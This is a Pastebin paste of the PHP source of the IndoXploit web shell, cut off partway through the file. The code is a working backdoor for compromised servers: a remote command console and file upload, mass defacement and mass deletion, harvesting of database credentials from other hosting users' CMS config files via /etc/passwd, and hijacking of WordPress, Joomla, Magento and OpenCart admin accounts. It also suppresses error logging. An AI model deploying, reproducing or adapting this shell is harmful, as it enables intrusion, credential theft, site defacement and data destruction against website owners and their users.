rezanugrah32

Untitled

Oct 30th, 2016
99
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 89.26 KB | None | 0 0
  1. <html>
  2. <head>
  3. <title>Mr. Kings - Private</title>
  4. <meta name='author' content='Mr. Kings'>
  5. <meta charset="UTF-8">
  6. <link href="http://zone-h.org/favicon.ico" rel="icon" type="image/x-icon"/>
  7. <style type='text/css'>
  8. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  9. html {
  10. background: #000000;
  11. color: #ffffff;
  12. font-family: 'Ubuntu';
  13. font-size: 13px;
  14. width: 100%;
  15. }
  16. li {
  17. display: inline;
  18. margin: 5px;
  19. padding: 5px;
  20. }
  21. table, th, td {
  22. border-collapse:collapse;
  23. font-family: Tahoma, Geneva, sans-serif;
  24. background: transparent;
  25. font-family: 'Ubuntu';
  26. font-size: 13px;
  27. }
  28. .table_home, .th_home, .td_home {
  29. border: 1px solid #ffffff;
  30. }
  31. th {
  32. padding: 10px;
  33. }
  34. a {
  35. color: #ffffff;
  36. text-decoration: none;
  37. }
  38. a:hover {
  39. color: gold;
  40. text-decoration: underline;
  41. }
  42. b {
  43. color: gold;
  44. }
  45. input[type=text], input[type=password],input[type=submit] {
  46. background: transparent;
  47. color: #ffffff;
  48. border: 1px solid #ffffff;
  49. margin: 5px auto;
  50. padding-left: 5px;
  51. font-family: 'Ubuntu';
  52. font-size: 13px;
  53. }
  54. textarea {
  55. border: 1px solid #ffffff;
  56. width: 100%;
  57. height: 400px;
  58. padding-left: 5px;
  59. margin: 10px auto;
  60. resize: none;
  61. background: transparent;
  62. color: #ffffff;
  63. font-family: 'Ubuntu';
  64. font-size: 13px;
  65. }
  66. select {
  67. width: 152px;
  68. background: #000000;
  69. color: lime;
  70. border: 1px solid #ffffff;
  71. margin: 5px auto;
  72. padding-left: 5px;
  73. font-family: 'Ubuntu';
  74. font-size: 13px;
  75. }
  76. option:hover {
  77. background: lime;
  78. color: #000000;
  79. }
  80. </style>
  81. </head>
  82. <body>
  83. <span> <font style="color:#2ecc71;">Data Mr. Kings</font> , Mau Logout ? <a href="lgt.php"><button>Logout</button></a> </span> <br /><br />
  84. <?php
  85. ###############################################################################
  86. // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
  87. // Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
  88. // Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
  89. // Tanpa kalian kita tidak akan BESAR seperti sekarang.
  90. // Greetz: All Member IndoXploit. & all my friends.
  91. ###############################################################################
  92. function w($dir,$perm) {
  93. if(!is_writable($dir)) {
  94. return "<font color=red>".$perm."</font>";
  95. } else {
  96. return "<font color=lime>".$perm."</font>";
  97. }
  98. }
  99. function r($dir,$perm) {
  100. if(!is_readable($dir)) {
  101. return "<font color=red>".$perm."</font>";
  102. } else {
  103. return "<font color=lime>".$perm."</font>";
  104. }
  105. }
  106. function exe($cmd) {
  107. if(function_exists('system')) {
  108. @ob_start();
  109. @system($cmd);
  110. $buff = @ob_get_contents();
  111. @ob_end_clean();
  112. return $buff;
  113. } elseif(function_exists('exec')) {
  114. @exec($cmd,$results);
  115. $buff = "";
  116. foreach($results as $result) {
  117. $buff .= $result;
  118. } return $buff;
  119. } elseif(function_exists('passthru')) {
  120. @ob_start();
  121. @passthru($cmd);
  122. $buff = @ob_get_contents();
  123. @ob_end_clean();
  124. return $buff;
  125. } elseif(function_exists('shell_exec')) {
  126. $buff = @shell_exec($cmd);
  127. return $buff;
  128. }
  129. }
  130. function perms($file){
  131. $perms = fileperms($file);
  132. if (($perms & 0xC000) == 0xC000) {
  133. // Socket
  134. $info = 's';
  135. } elseif (($perms & 0xA000) == 0xA000) {
  136. // Symbolic Link
  137. $info = 'l';
  138. } elseif (($perms & 0x8000) == 0x8000) {
  139. // Regular
  140. $info = '-';
  141. } elseif (($perms & 0x6000) == 0x6000) {
  142. // Block special
  143. $info = 'b';
  144. } elseif (($perms & 0x4000) == 0x4000) {
  145. // Directory
  146. $info = 'd';
  147. } elseif (($perms & 0x2000) == 0x2000) {
  148. // Character special
  149. $info = 'c';
  150. } elseif (($perms & 0x1000) == 0x1000) {
  151. // FIFO pipe
  152. $info = 'p';
  153. } else {
  154. // Unknown
  155. $info = 'u';
  156. }
  157. // Owner
  158. $info .= (($perms & 0x0100) ? 'r' : '-');
  159. $info .= (($perms & 0x0080) ? 'w' : '-');
  160. $info .= (($perms & 0x0040) ?
  161. (($perms & 0x0800) ? 's' : 'x' ) :
  162. (($perms & 0x0800) ? 'S' : '-'));
  163. // Group
  164. $info .= (($perms & 0x0020) ? 'r' : '-');
  165. $info .= (($perms & 0x0010) ? 'w' : '-');
  166. $info .= (($perms & 0x0008) ?
  167. (($perms & 0x0400) ? 's' : 'x' ) :
  168. (($perms & 0x0400) ? 'S' : '-'));
  169. // World
  170. $info .= (($perms & 0x0004) ? 'r' : '-');
  171. $info .= (($perms & 0x0002) ? 'w' : '-');
  172. $info .= (($perms & 0x0001) ?
  173. (($perms & 0x0200) ? 't' : 'x' ) :
  174. (($perms & 0x0200) ? 'T' : '-'));
  175. return $info;
  176. }
  177. function hdd($s) {
  178. if($s >= 1073741824)
  179. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  180. elseif($s >= 1048576)
  181. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  182. elseif($s >= 1024)
  183. return sprintf('%1.2f',$s / 1024 ) .' KB';
  184. else
  185. return $s .' B';
  186. }
  187. function ambilKata($param, $kata1, $kata2){
  188. if(strpos($param, $kata1) === FALSE) return FALSE;
  189. if(strpos($param, $kata2) === FALSE) return FALSE;
  190. $start = strpos($param, $kata1) + strlen($kata1);
  191. $end = strpos($param, $kata2, $start);
  192. $return = substr($param, $start, $end - $start);
  193. return $return;
  194. }
  195. if(get_magic_quotes_gpc()) {
  196. function idx_ss($array) {
  197. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  198. }
  199. $_POST = idx_ss($_POST);
  200. }
  201.  
  202. error_reporting(0);
  203. @ini_set('error_log',NULL);
  204. @ini_set('log_errors',0);
  205. @ini_set('max_execution_time',0);
  206. @set_time_limit(0);
  207. @set_magic_quotes_runtime(0);
  208. if(isset($_GET['dir'])) {
  209. $dir = $_GET['dir'];
  210. chdir($dir);
  211. } else {
  212. $dir = getcwd();
  213. }
  214. $dir = str_replace("\\","/",$dir);
  215. $scdir = explode("/", $dir);
  216. $freespace = hdd(disk_free_space("/"));
  217. $total = hdd(disk_total_space("/"));
  218. $used = $total - $freespace;
  219. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  220. $ds = @ini_get("disable_functions");
  221. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  222. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  223. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  224. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  225. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  226. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  227. if(!function_exists('posix_getegid')) {
  228. $user = @get_current_user();
  229. $uid = @getmyuid();
  230. $gid = @getmygid();
  231. $group = "?";
  232. } else {
  233. $uid = @posix_getpwuid(posix_geteuid());
  234. $gid = @posix_getgrgid(posix_getegid());
  235. $user = $uid['name'];
  236. $uid = $uid['uid'];
  237. $group = $gid['name'];
  238. $gid = $gid['gid'];
  239. }
  240. echo "System: <font color=lime>".php_uname()."</font><br>";
  241. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
  242. echo "Server IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
  243. echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
  244. echo "Safe Mode: $sm<br>";
  245. echo "Disable Functions: $show_ds<br>";
  246. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  247. echo "Current DIR: ";
  248. foreach($scdir as $c_dir => $cdir) {
  249. echo "<a href='?dir=";
  250. for($i = 0; $i <= $c_dir; $i++) {
  251. echo $scdir[$i];
  252. if($i != $c_dir) {
  253. echo "/";
  254. }
  255. }
  256. echo "'>$cdir</a>/";
  257. }
  258. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  259. echo "<hr>";
  260. echo "<center>";
  261. echo "<ul>";
  262. echo "<li>[ <a href='?'>Home</a> ]</li>";
  263. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
  264. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
  265. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  266. echo "<li>[ <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> ]</li>";
  267. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
  268. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
  269. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  270. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  271. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
  272. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li>";
  273. echo "<li>[ <a href='?dir=$dir&do=network'>network</a> ]</li>";
  274. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li><br>";
  275. echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
  276. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
  277. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
  278. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
  279. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
  280. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
  281. echo "<li>[ <a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> ]</li>";
  282. echo "</ul>";
  283. echo "</center>";
  284. echo "<hr>";
  285. if($_GET['do'] == 'upload') {
  286. echo "<center>";
  287. if($_POST['upload']) {
  288. if($_POST['tipe_upload'] == 'biasa') {
  289. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  290. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  291. } else {
  292. $act = "<font color=red>failed to upload file</font>";
  293. }
  294. } else {
  295. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  296. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  297. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  298. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  299. $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  300. } else {
  301. $act = "<font color=red>failed to upload file</font>";
  302. }
  303. } else {
  304. $act = "<font color=red>failed to upload file</font>";
  305. }
  306. }
  307. }
  308. echo "Upload File:
  309. <form method='post' enctype='multipart/form-data'>
  310. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  311. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  312. <input type='file' name='ix_file'>
  313. <input type='submit' value='upload' name='upload'>
  314. </form>";
  315. echo $act;
  316. echo "</center>";
  317. } elseif($_GET['do'] == 'cmd') {
  318. echo "<form method='post'>
  319. <font style='text-decoration: underline;'>".$user."@".gethostbyname($_SERVER['HTTP_HOST']).": ~ $ </font>
  320. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  321. </form>";
  322. if($_POST['do_cmd']) {
  323. echo "<pre>".exe($_POST['cmd'])."</pre>";
  324. }
  325. } elseif($_GET['do'] == 'mass_deface') {
  326. function sabun_massal($dir,$namafile,$isi_script) {
  327. if(is_writable($dir)) {
  328. $dira = scandir($dir);
  329. foreach($dira as $dirb) {
  330. $dirc = "$dir/$dirb";
  331. $lokasi = $dirc.'/'.$namafile;
  332. if($dirb === '.') {
  333. file_put_contents($lokasi, $isi_script);
  334. } elseif($dirb === '..') {
  335. file_put_contents($lokasi, $isi_script);
  336. } else {
  337. if(is_dir($dirc)) {
  338. if(is_writable($dirc)) {
  339. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  340. file_put_contents($lokasi, $isi_script);
  341. $idx = sabun_massal($dirc,$namafile,$isi_script);
  342. }
  343. }
  344. }
  345. }
  346. }
  347. }
  348. function sabun_biasa($dir,$namafile,$isi_script) {
  349. if(is_writable($dir)) {
  350. $dira = scandir($dir);
  351. foreach($dira as $dirb) {
  352. $dirc = "$dir/$dirb";
  353. $lokasi = $dirc.'/'.$namafile;
  354. if($dirb === '.') {
  355. file_put_contents($lokasi, $isi_script);
  356. } elseif($dirb === '..') {
  357. file_put_contents($lokasi, $isi_script);
  358. } else {
  359. if(is_dir($dirc)) {
  360. if(is_writable($dirc)) {
  361. echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
  362. file_put_contents($lokasi, $isi_script);
  363. }
  364. }
  365. }
  366. }
  367. }
  368. }
  369. if($_POST['start']) {
  370. if($_POST['tipe_sabun'] == 'mahal') {
  371. echo "<div style='margin: 5px auto; padding: 5px'>";
  372. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  373. echo "</div>";
  374. } elseif($_POST['tipe_sabun'] == 'murah') {
  375. echo "<div style='margin: 5px auto; padding: 5px'>";
  376. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  377. echo "</div>";
  378. }
  379. } else {
  380. echo "<center>";
  381. echo "<form method='post'>
  382. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  383. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  384. <font style='text-decoration: underline;'>Folder:</font><br>
  385. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  386. <font style='text-decoration: underline;'>Filename:</font><br>
  387. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  388. <font style='text-decoration: underline;'>Index File:</font><br>
  389. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by IndoXploit</textarea><br>
  390. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  391. </form></center>";
  392. }
  393. } elseif($_GET['do'] == 'mass_delete') {
  394. function hapus_massal($dir,$namafile) {
  395. if(is_writable($dir)) {
  396. $dira = scandir($dir);
  397. foreach($dira as $dirb) {
  398. $dirc = "$dir/$dirb";
  399. $lokasi = $dirc.'/'.$namafile;
  400. if($dirb === '.') {
  401. if(file_exists("$dir/$namafile")) {
  402. unlink("$dir/$namafile");
  403. }
  404. } elseif($dirb === '..') {
  405. if(file_exists("".dirname($dir)."/$namafile")) {
  406. unlink("".dirname($dir)."/$namafile");
  407. }
  408. } else {
  409. if(is_dir($dirc)) {
  410. if(is_writable($dirc)) {
  411. if(file_exists($lokasi)) {
  412. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  413. unlink($lokasi);
  414. $idx = hapus_massal($dirc,$namafile);
  415. }
  416. }
  417. }
  418. }
  419. }
  420. }
  421. }
  422. if($_POST['start']) {
  423. echo "<div style='margin: 5px auto; padding: 5px'>";
  424. hapus_massal($_POST['d_dir'], $_POST['d_file']);
  425. echo "</div>";
  426. } else {
  427. echo "<center>";
  428. echo "<form method='post'>
  429. <font style='text-decoration: underline;'>Folder:</font><br>
  430. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  431. <font style='text-decoration: underline;'>Filename:</font><br>
  432. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  433. <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
  434. </form></center>";
  435. }
  436. } elseif($_GET['do'] == 'config') {
  437. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  438. $idx = mkdir("idx_config", 0777);
  439. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  440. $htc = fopen("idx_config/.htaccess","w");
  441. fwrite($htc, $isi_htc);
  442. while($passwd = fgets($etc)) {
  443. if($passwd == "" || !$etc) {
  444. echo "<font color=red>Can't read /etc/passwd</font>";
  445. } else {
  446. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  447. foreach($user_config[1] as $user_idx) {
  448. $user_config_dir = "/home/$user_idx/public_html/";
  449. if(is_readable($user_config_dir)) {
  450. $grab_config = array(
  451. "/home/$user_idx/.my.cnf" => "cpanel",
  452. "/home/$user_idx/.accesshash" => "WHM-accesshash",
  453. "/home/$user_idx/public_html/vdo_config.php" => "Voodoo",
  454. "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
  455. "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
  456. "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  457. "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
  458. "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
  459. "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
  460. "/home/$user_idx/public_html/forum/config.php" => "phpBB",
  461. "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
  462. "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
  463. "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
  464. "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
  465. "/home/$user_idx/public_html/configuration.php" => "Joomla",
  466. "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
  467. "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
  468. "/home/$user_idx/public_html/wp-config.php" => "WordPress",
  469. "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
  470. "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
  471. "/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
  472. foreach($grab_config as $config => $nama_config) {
  473. $ambil_config = file_get_contents($config);
  474. if($ambil_config == '') {
  475. } else {
  476. $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
  477. fputs($file_config,$ambil_config);
  478. }
  479. }
  480. }
  481. }
  482. }
  483. }
  484. echo "<center><a href='?dir=$dir/idx_config'><font color=lime>Done</font></a></center>";
  485. } elseif($_GET['do'] == 'jumping') {
  486. $i = 0;
  487. echo "<pre><div class='margin: 5px auto;'>";
  488. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  489. while($passwd = fgets($etc)) {
  490. if($passwd == '' || !$etc) {
  491. echo "<font color=red>Can't read /etc/passwd</font>";
  492. } else {
  493. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  494. foreach($user_jumping[1] as $user_idx_jump) {
  495. $user_jumping_dir = "/home/$user_idx_jump/public_html";
  496. if(is_readable($user_jumping_dir)) {
  497. $i++;
  498. $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  499. if(is_writable($user_jumping_dir)) {
  500. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  501. }
  502. echo $jrw;
  503. if(function_exists('posix_getpwuid')) {
  504. $domain_jump = file_get_contents("/etc/named.conf");
  505. if($domain_jump == '') {
  506. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  507. } else {
  508. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  509. foreach($domains_jump[1] as $dj) {
  510. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  511. $user_jumping_url = $user_jumping_url['name'];
  512. if($user_jumping_url == $user_idx_jump) {
  513. echo " => ( <u>$dj</u> )<br>";
  514. break;
  515. }
  516. }
  517. }
  518. } else {
  519. echo "<br>";
  520. }
  521. }
  522. }
  523. }
  524. }
  525. if($i == 0) {
  526. } else {
  527. echo "<br>Total ada ".$i." Kamar di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  528. }
  529. echo "</div></pre>";
  530. } elseif($_GET['do'] == 'auto_edit_user') {
  531. if($_POST['hajar']) {
  532. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  533. echo "username atau password harus lebih dari 6 karakter";
  534. } else {
  535. $user_baru = $_POST['user_baru'];
  536. $pass_baru = md5($_POST['pass_baru']);
  537. $conf = $_POST['config_dir'];
  538. $scan_conf = scandir($conf);
  539. foreach($scan_conf as $file_conf) {
  540. if(!is_file("$conf/$file_conf")) continue;
  541. $config = file_get_contents("$conf/$file_conf");
  542. if(preg_match("/JConfig|joomla/",$config)) {
  543. $dbhost = ambilkata($config,"host = '","'");
  544. $dbuser = ambilkata($config,"user = '","'");
  545. $dbpass = ambilkata($config,"password = '","'");
  546. $dbname = ambilkata($config,"db = '","'");
  547. $dbprefix = ambilkata($config,"dbprefix = '","'");
  548. $prefix = $dbprefix."users";
  549. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  550. $db = mysql_select_db($dbname);
  551. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  552. $result = mysql_fetch_array($q);
  553. $id = $result['id'];
  554. $site = ambilkata($config,"sitename = '","'");
  555. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  556. echo "Config => ".$file_conf."<br>";
  557. echo "CMS => Joomla<br>";
  558. if($site == '') {
  559. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  560. } else {
  561. echo "Sitename => $site<br>";
  562. }
  563. if(!$update OR !$conn OR !$db) {
  564. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  565. } else {
  566. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  567. }
  568. mysql_close($conn);
  569. } elseif(preg_match("/WordPress/",$config)) {
  570. $dbhost = ambilkata($config,"DB_HOST', '","'");
  571. $dbuser = ambilkata($config,"DB_USER', '","'");
  572. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  573. $dbname = ambilkata($config,"DB_NAME', '","'");
  574. $dbprefix = ambilkata($config,"table_prefix = '","'");
  575. $prefix = $dbprefix."users";
  576. $option = $dbprefix."options";
  577. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  578. $db = mysql_select_db($dbname);
  579. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  580. $result = mysql_fetch_array($q);
  581. $id = $result[ID];
  582. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  583. $result2 = mysql_fetch_array($q2);
  584. $target = $result2[option_value];
  585. if($target == '') {
  586. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  587. } else {
  588. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  589. }
  590. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  591. echo "Config => ".$file_conf."<br>";
  592. echo "CMS => Wordpress<br>";
  593. echo $url_target;
  594. if(!$update OR !$conn OR !$db) {
  595. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  596. } else {
  597. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  598. }
  599. mysql_close($conn);
  600. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  601. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  602. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  603. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  604. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  605. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  606. $prefix = $dbprefix."admin_user";
  607. $option = $dbprefix."core_config_data";
  608. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  609. $db = mysql_select_db($dbname);
  610. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  611. $result = mysql_fetch_array($q);
  612. $id = $result[user_id];
  613. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  614. $result2 = mysql_fetch_array($q2);
  615. $target = $result2[value];
  616. if($target == '') {
  617. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  618. } else {
  619. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  620. }
  621. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  622. echo "Config => ".$file_conf."<br>";
  623. echo "CMS => Magento<br>";
  624. echo $url_target;
  625. if(!$update OR !$conn OR !$db) {
  626. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  627. } else {
  628. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  629. }
  630. mysql_close($conn);
  631. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  632. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  633. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  634. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  635. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  636. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  637. $prefix = $dbprefix."user";
  638. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  639. $db = mysql_select_db($dbname);
  640. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  641. $result = mysql_fetch_array($q);
  642. $id = $result[user_id];
  643. $target = ambilkata($config,"HTTP_SERVER', '","'");
  644. if($target == '') {
  645. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  646. } else {
  647. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  648. }
  649. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  650. echo "Config => ".$file_conf."<br>";
  651. echo "CMS => OpenCart<br>";
  652. echo $url_target;
  653. if(!$update OR !$conn OR !$db) {
  654. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  655. } else {
  656. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  657. }
  658. mysql_close($conn);
  659. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  660. $dbhost = ambilkata($config,'server = "','"');
  661. $dbuser = ambilkata($config,'username = "','"');
  662. $dbpass = ambilkata($config,'password = "','"');
  663. $dbname = ambilkata($config,'database = "','"');
  664. $prefix = "users";
  665. $option = "identitas";
  666. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  667. $db = mysql_select_db($dbname);
  668. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  669. $result = mysql_fetch_array($q);
  670. $target = $result[alamat_website];
  671. if($target == '') {
  672. $target2 = $result[url];
  673. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  674. if($target2 == '') {
  675. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  676. } else {
  677. $cek_login3 = file_get_contents("$target2/adminweb/");
  678. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  679. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  680. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  681. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  682. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  683. } else {
  684. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  685. }
  686. }
  687. } else {
  688. $cek_login = file_get_contents("$target/adminweb/");
  689. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  690. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  691. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  692. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  693. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  694. } else {
  695. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  696. }
  697. }
  698. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  699. echo "Config => ".$file_conf."<br>";
  700. echo "CMS => Lokomedia<br>";
